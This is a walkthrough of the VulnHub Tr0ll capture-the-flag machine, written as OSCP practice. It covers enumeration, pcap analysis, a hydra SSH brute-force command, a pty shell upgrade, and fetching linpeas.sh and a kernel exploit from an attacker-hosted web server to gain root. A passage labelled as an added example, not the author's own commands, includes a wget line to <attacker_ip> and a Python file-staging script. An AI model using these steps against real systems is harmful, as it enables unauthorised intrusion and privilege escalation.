Tr0ll machine — Walkthrough

Cursemagic
5 min read · Dec 27, 2023


Hi guys, this is the tenth day and tenth box (10D-10B for my personal reference). I will be trying to complete at least one box per day (two or more if I can) so I can gain confidence, learn new things, and prepare for the OSCP.

Wish me luck!

So, today I would like to work on Tr0ll machine, which is from VulnHub. Let’s get started!

Please read to the end! Thank you!

Enumeration

Nmap

Ports 21, 22, and 80 are open.

Port 80 — HTTP

Yes, we have a bit of a problem.

Exiftool found nothing.

/secret

Exiftool also yielded nothing.

Port 21 — FTP

The port is open and no password is needed (anonymous login). Hopefully there is something useful here.

There is a pcap file that we can grab. Wireshark it is, then.

Wireshark

Fire up Wireshark. I tried Analyze -> Follow -> TCP Stream.

And we get this. It looks like there is a secret_stuff.txt on the FTP server.

We also have this. This might be a directory.

/sup3rs3cr3tdirlol

Clicking the file downloads it. It is an executable file.

I made the file executable and, once I ran it, it asked me to find that address.

And we can see:

/good_luck/which_one_lol.txt

We can see this when it is clicked. We can try the names in that list one by one, or using hydra might be faster.

/this_folder_contains_the_password/Pass.txt

This really might be the password, or the text file's name is the password.

I tried to SSH with them, but it failed for most of them, except overflow and genphlux.

Let’s try hydra.

hydra -L <namelist_path> -P <password_path> <target_ip> ssh

Indeed, what a sneaky bastard.

SSH to overflow

Now we can SSH to the remote host. But you have to act fast, as it will close the connection after a few seconds.

But once I upgraded the shell, it looked fine.

python -c 'import pty; pty.spawn("/bin/bash")'

But after a while, yes, I got disconnected again.

Set up a web server and download linpeas.sh to the victim.

We managed to run linpeas.sh before the SSH session was closed.

Let's see what we can do. (Disclaimer: I failed to escalate my privileges using this method, but there is another method below.)

I changed it to this.

Then I tried to run it, and it failed. (Please let me know where I went wrong. Thanks!)

Maybe I should try another method.

Method 2 — Previous method failed…

Using searchsploit to gather information.

We can follow the steps here:

Now let's try it! Set up an HTTP server for the target machine to download the exploit from, then run it by following the steps on Exploit-DB. Once it completes, we get root!
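Staging a file over HTTP, both for linpeas.sh above and for the exploit here, as an added example that is not the author's own commands: the usual form is `python3 -m http.server 8000` in the directory holding the file on the attacking machine, and `wget http://<attacker_ip>:8000/linpeas.sh` on the target. The block below runs both ends in one process on loopback so it can be executed offline, and adds the check worth doing before executing anything you pulled onto a target: compare the download's SHA-256 against the copy you staged (the same value `sha256sum` prints on the attacker box). The file name, content and addresses are constructed placeholders.

```python
import hashlib
import os
import tempfile
import threading
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from urllib.request import urlopen

# Constructed stand-in for the tool being staged (the real transfer would carry
# linpeas.sh or the exploit source); only its bytes and hash matter for the demo.
STAGED_NAME = "linpeas.sh"
STAGED_CONTENT = b"#!/bin/sh\necho 'constructed placeholder, not the real linpeas'\n"

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def start_server(directory, bind="127.0.0.1", port=0):
    """Attacker side: the programmatic equivalent of `python3 -m http.server` in `directory`.
    Port 0 lets the OS pick a free port; a real engagement binds 0.0.0.0 on a fixed port."""
    handler = partial(SimpleHTTPRequestHandler, directory=directory)
    httpd = ThreadingHTTPServer((bind, port), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd

def fetch_and_verify(url, expected_sha256):
    """Target side: download the staged file and refuse to use it unless the hash matches."""
    with urlopen(url, timeout=5) as resp:
        data = resp.read()
    if sha256_hex(data) != expected_sha256:
        raise ValueError("downloaded file does not match the staged copy")
    return data

def stage_and_fetch(expected_sha256=None):
    """Run both ends on loopback: stage the file, serve it, fetch it, verify it.
    `expected_sha256` defaults to the hash of the staged copy; pass a different value
    to see the verification reject the download."""
    expected = expected_sha256 or sha256_hex(STAGED_CONTENT)
    with tempfile.TemporaryDirectory() as staging:
        with open(os.path.join(staging, STAGED_NAME), "wb") as f:
            f.write(STAGED_CONTENT)
        httpd = start_server(staging)
        try:
            host, port = httpd.server_address[:2]
            return fetch_and_verify(f"http://{host}:{port}/{STAGED_NAME}", expected)
        finally:
            httpd.shutdown()
            httpd.server_close()

if __name__ == "__main__":
    got = stage_and_fetch()
    print("fetched", len(got), "bytes; sha256", sha256_hex(got))
```

On the box itself the two halves are split: the server runs on the attacker, the fetch and the hash comparison run on the target inside the short-lived SSH session, which is one more reason to keep the staged file small and the command a one-liner.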

And we get the flag!

Voila! Another box done and new things learnt!

Thank you for reading my write-up. I would like to improve my write-up skills in the future; you can reach me through Twitter or the comments. Sponsors are also welcome.

Twitter: https://twitter.com/curse_jk

Buy me a coffee: http://buymeacoffee.com/Cursemagic

Other medium write-ups: https://cursemagic.medium.com
